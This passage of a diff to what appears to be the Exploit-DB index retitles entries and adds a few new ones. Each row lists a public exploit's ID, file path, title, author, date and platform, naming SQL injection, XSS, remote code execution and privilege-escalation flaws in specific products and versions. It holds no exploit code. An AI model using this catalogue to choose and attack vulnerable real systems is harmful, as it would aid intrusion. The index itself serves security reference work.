Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injection",2009-02-10,"Francesco Bianchino",asp,webapps,0 -32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' Username SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 +32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 @@ -29573,7 +29574,7 @@ id,file,description,date,author,platform,type,port 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0 32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 -32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login[username] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 @@ -29590,7 +29591,7 @@ id,file,description,date,author,platform,type,port 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 -32813,platforms/osx/local/32813.c,"Apple Mac OS X (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0 +32813,platforms/osx/local/32813.c,"Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0 32827,platforms/php/webapps/32827.txt,"Afian - 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,php,webapps,0 32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass",2009-03-02,"Chris Evans",linux,local,0 @@ -29630,7 +29631,7 @@ id,file,description,date,author,platform,type,port 32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 - 'UWCMain' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 32865,platforms/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0 -32866,platforms/ios/webapps/32866.txt,"PDF Album 1.7 iOS - File Include Web",2014-04-14,Vulnerability-Lab,ios,webapps,0 +32866,platforms/ios/webapps/32866.txt,"PDF Album 1.7 iOS - File Inclusion",2014-04-14,Vulnerability-Lab,ios,webapps,0 32867,platforms/php/webapps/32867.txt,"WordPress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32868,platforms/php/webapps/32868.txt,"WordPress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console - Command Injection",2014-04-14,Metasploit,linux,webapps,10080 @@ -29656,7 +29657,7 @@ id,file,description,date,author,platform,type,port 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 -32894,platforms/multiple/webapps/32894.txt,"IBM Bladecenter Advanced Management Module 1.42 - Login username Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32894,platforms/multiple/webapps/32894.txt,"IBM Bladecenter Advanced Management Module 1.42 - Login 'Username' Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 32895,platforms/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - private/file_Management.ssi PATH Parameter Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 32896,platforms/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",multiple,webapps,0 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0 @@ -29718,7 +29719,7 @@ id,file,description,date,author,platform,type,port 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 32959,platforms/windows/remote/32959.rb,"Adobe Flash Player - Regular Expression Heap Overflow",2014-04-21,Metasploit,windows,remote,0 -33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 +33337,platforms/osx/dos/33337.c,"Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",linux,dos,0 32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 - Security Bypass",2009-04-29,J.Greil,cgi,remote,0 @@ -29776,12 +29777,12 @@ id,file,description,date,author,platform,type,port 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service",2009-05-29,"Miklos Szeredi",linux,dos,0 33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN - 'cgi-bin/welcome/VirtualOffice' Remote Format String",2009-05-29,"Patrick Webster",hardware,remote,0 33017,platforms/linux/dos/33017.txt,"Adobe Acrobat 9.1.3 - Stack Exhaustion Denial of Service",2009-05-29,"Saint Patrick",linux,dos,0 -33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0 +33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial Of Service)",2014-04-25,LiquidWorm,windows,dos,0 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",multiple,webapps,0 -33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' NULL Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 +33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module - 'query' Parameter Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 -33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing Username Enumeration",2009-06-03,"D. Matscheko",multiple,remote,0 +33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enumeration",2009-06-03,"D. Matscheko",multiple,remote,0 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote,0 33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0 @@ -29794,7 +29795,7 @@ id,file,description,date,author,platform,type,port 33034,platforms/linux/remote/33034.txt,"WebKit - XML External Entity Information Disclosure",2009-05-08,"Chris Evans",linux,remote,0 33035,platforms/windows/remote/33035.txt,"Microsoft Windows Media Player 11 - ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote,0 33036,platforms/linux/dos/33036.txt,"Git 1.6.3 - Parameter Processing Remote Denial Of Service",2009-05-05,"Shawn O. Pearce",linux,dos,0 -33037,platforms/multiple/dos/33037.html,"Apple QuickTime 7.4.1 - NULL Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 +33037,platforms/multiple/dos/33037.html,"Apple QuickTime 7.4.1 - Null Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0 33039,platforms/linux/remote/33039.txt,"Mozilla Firefox 3.0.10 / SeaMonkey 1.1.16 - Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",linux,remote,0 33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 - Message Handling Denial Of Service",2009-05-03,"Zeeshan Ali",linux,dos,0 @@ -29826,7 +29827,7 @@ id,file,description,date,author,platform,type,port 33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote,0 33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Parameter Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0 33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,Metasploit,windows,local,0 -33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution Exploit",2014-04-28,LOTFREE,php,webapps,80 +33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution",2014-04-28,LOTFREE,php,webapps,80 33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123 @@ -29842,7 +29843,7 @@ id,file,description,date,author,platform,type,port 33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Parameter Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0 33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 - Invalid Query Remote Denial of Service",2009-06-06,"Luigi Auriemma",multiple,dos,0 33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps,0 -33088,platforms/linux/dos/33088.txt,"Linux Kernel 2.6.30 - 'tun_chr_pool()' NULL Pointer Dereference",2009-06-17,"Christian Borntraeger",linux,dos,0 +33088,platforms/linux/dos/33088.txt,"Linux Kernel 2.6.30 - 'tun_chr_pool()' Null Pointer Dereference",2009-06-17,"Christian Borntraeger",linux,dos,0 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80 @@ -29895,17 +29896,17 @@ id,file,description,date,author,platform,type,port 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0 33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 and AIR - URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,multiple,dos,0 33134,platforms/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos,0 -33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0 +33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,hardware,webapps,0 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0 33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",multiple,dos,0 -33142,platforms/multiple/remote/33142.rb,"Apache Struts - ClassLoader manipulation Remote Code Execution",2014-05-02,Metasploit,multiple,remote,8080 +33142,platforms/multiple/remote/33142.rb,"Apache Struts - ClassLoader Manipulation Remote Code Execution",2014-05-02,Metasploit,multiple,remote,8080 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",hardware,remote,443 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",php,webapps,0 33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-05,"599eme Man",php,webapps,0 -33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' NULL Pointer Dereference Denial of Service",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 +33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' Null Pointer Dereference Denial of Service",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 33149,platforms/php/webapps/33149.txt,"Alkacon OpenCMS 7.x - Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0 33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0 33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting / SQL Injection",2009-08-07,"599eme Man",php,webapps,0 @@ -29932,10 +29933,11 @@ id,file,description,date,author,platform,type,port 33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (1)",2007-02-07,trevordixon,windows,dos,0 33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (2)",2007-02-07,trevordixon,windows,dos,0 33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (3)",2007-02-07,trevordixon,windows,dos,0 -33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication NULL Pointer Dereference Denial Of Service",2009-08-18,"Brad Antoniewicz",linux,dos,0 +33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial Of Service",2009-08-18,"Brad Antoniewicz",linux,dos,0 33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,java,webapps,0 +40346,platforms/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",multiple,webapps,0 33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",multiple,webapps,0 33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder - Unicode Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service",2009-08-23,"Luigi Auriemma",multiple,dos,0 @@ -29949,13 +29951,13 @@ id,file,description,date,author,platform,type,port 33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 - SQL Injection",2009-08-25,"Andrew Horton",php,webapps,0 33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie Parameter SQL Injection",2009-08-28,Inj3ct0r,php,webapps,0 33192,platforms/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",multiple,remote,0 -33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos,0 +33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos,0 33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 -33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Secuity Bypass",2009-09-02,"Johannes Dahse",multiple,remote,0 +33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",multiple,remote,0 33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0 33205,platforms/windows/dos/33205.pl,"Nokia MultiMedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross-Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 @@ -30098,6 +30100,7 @@ id,file,description,date,author,platform,type,port 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 33365,platforms/php/webapps/33365.txt,"WordPress WP-phpList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 +40345,platforms/php/webapps/40345.txt,"Freepbx 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0 33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 33367,platforms/php/webapps/33367.txt,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 33368,platforms/php/webapps/33368.html,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 @@ -30174,12 +30177,13 @@ id,file,description,date,author,platform,type,port 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 33478,platforms/php/webapps/33478.txt,"Joomla! Jobads - 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0 -33479,platforms/osx/dos/33479.c,"Apple Mac OS X 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 +33479,platforms/osx/dos/33479.c,"Apple Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting",2010-01-09,Cyber_945,asp,webapps,0 33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Parameter Cross-Site Scripting",2010-01-10,"ViRuSMaN ",php,webapps,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos,0 33484,platforms/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 +40344,platforms/php/remote/40344.rb,"SugarCRM 6.5.23 - REST PHP Object Injection Exploit (Metasploit)",2016-09-07,"Egidio Romano",php,remote,80 33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PHPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 @@ -30211,7 +30215,7 @@ id,file,description,date,author,platform,type,port 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b - Security Bypass / Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0 33518,platforms/hardware/webapps/33518.txt,"ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 -33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 +33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload",2014-05-26,Metasploit,multiple,remote,9855 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote,0 @@ -30250,7 +30254,7 @@ id,file,description,date,author,platform,type,port 33546,platforms/php/webapps/33546.txt,"Jokes Complete Website - results.php searchingred Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0 -33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' NULL Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0 +33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' Null Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0 33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",windows,remote,0 @@ -30329,6 +30333,7 @@ id,file,description,date,author,platform,type,port 33656,platforms/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 - 'archive.php' SQL Injection",2010-02-18,"AmnPardaz Security Research Team",php,webapps,0 33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI - 'message' Parameter Cross-Site Scripting",2010-02-18,thebluegenius,php,webapps,0 33658,platforms/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,php,webapps,0 +40343,platforms/php/webapps/40343.txt,"CumulusClips 2.4.1 - Multiple Vulnerabilities",2016-09-07,kor3k,php,webapps,80 33659,platforms/php/webapps/33659.txt,"Joomla! 'com_recipe' Component - Multiple SQL Injections",2010-02-20,FL0RiX,php,webapps,0 33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0 33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box - Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0 @@ -30355,10 +30360,10 @@ id,file,description,date,author,platform,type,port 33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Parameter Cross-Site Scripting",2010-03-02,"lis cker",php,webapps,0 33689,platforms/multiple/remote/33689.as,"Adobe 